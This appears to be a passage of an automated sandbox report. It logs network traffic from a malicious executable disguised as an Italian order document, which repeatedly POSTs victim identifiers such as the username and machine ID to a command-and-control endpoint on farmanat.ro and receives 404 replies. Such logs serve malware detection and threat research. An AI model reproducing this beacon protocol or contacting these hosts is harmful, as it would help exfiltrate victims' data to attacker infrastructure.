                                              Nov 25, 2021 10:51:40.142401934 CET6894OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:40.176708937 CET6894OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:40.228552103 CET6895INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:39 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              413192.168.11.2050257176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:40.656007051 CET6895OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:40.689590931 CET6896OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:40.739022970 CET6896INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:39 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              414192.168.11.2050258176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:41.141474009 CET6897OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:41.175769091 CET6897OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:41.226566076 CET6897INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:40 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              415192.168.11.2050259176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:41.613563061 CET6898OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:41.647212029 CET6898OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:41.698240042 CET6899INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:40 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              416192.168.11.2050260176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:42.168917894 CET6899OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:42.202502012 CET6900OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:42.252224922 CET6900INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:41 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              417192.168.11.2050261176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:42.653882027 CET6901OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:42.688277960 CET6901OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:42.738009930 CET6901INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:41 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              418192.168.11.2050262176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:43.154211998 CET6902OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:43.187589884 CET6902OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:43.237607956 CET6903INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:42 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              419192.168.11.2050263176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:43.663132906 CET6903OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:43.697297096 CET6904OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:43.746808052 CET6904INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:42 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              42192.168.11.2049878176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:28.858505011 CET6368OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:28.892165899 CET6369OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:28.941189051 CET6369INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:27 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              420192.168.11.2050264176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:44.124896049 CET6905OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:44.158967972 CET6905OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:44.213745117 CET6905INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:43 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              421192.168.11.2050265176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:44.645262957 CET6906OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:44.678891897 CET6906OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:44.730153084 CET6907INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:43 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              422192.168.11.2050266176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:45.106868029 CET6907OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:45.140907049 CET6908OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:45.199707031 CET6908INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:44 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              423192.168.11.2050267176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:45.594588995 CET6909OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:45.628153086 CET6909OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:45.682820082 CET6909INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:44 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              424192.168.11.2050268176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:46.101808071 CET6910OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:46.135593891 CET6910OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:46.186052084 CET6911INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:45 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              425192.168.11.2050269176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:46.597645998 CET6911OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:46.631548882 CET6912OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:46.688225985 CET6912INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:45 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              426192.168.11.2050270176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:47.109618902 CET6913OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:47.143276930 CET6913OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:47.194964886 CET6913INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:46 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              427192.168.11.2050271176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:47.611890078 CET6914OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:47.646148920 CET6914OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:47.698836088 CET6915INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:46 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              428192.168.11.2050272176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:48.126750946 CET6915OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:48.161307096 CET6916OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:48.213126898 CET6916INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:47 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              429192.168.11.2050273176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:48.626426935 CET6917OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:48.659986019 CET6917OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:48.710149050 CET6917INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:47 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
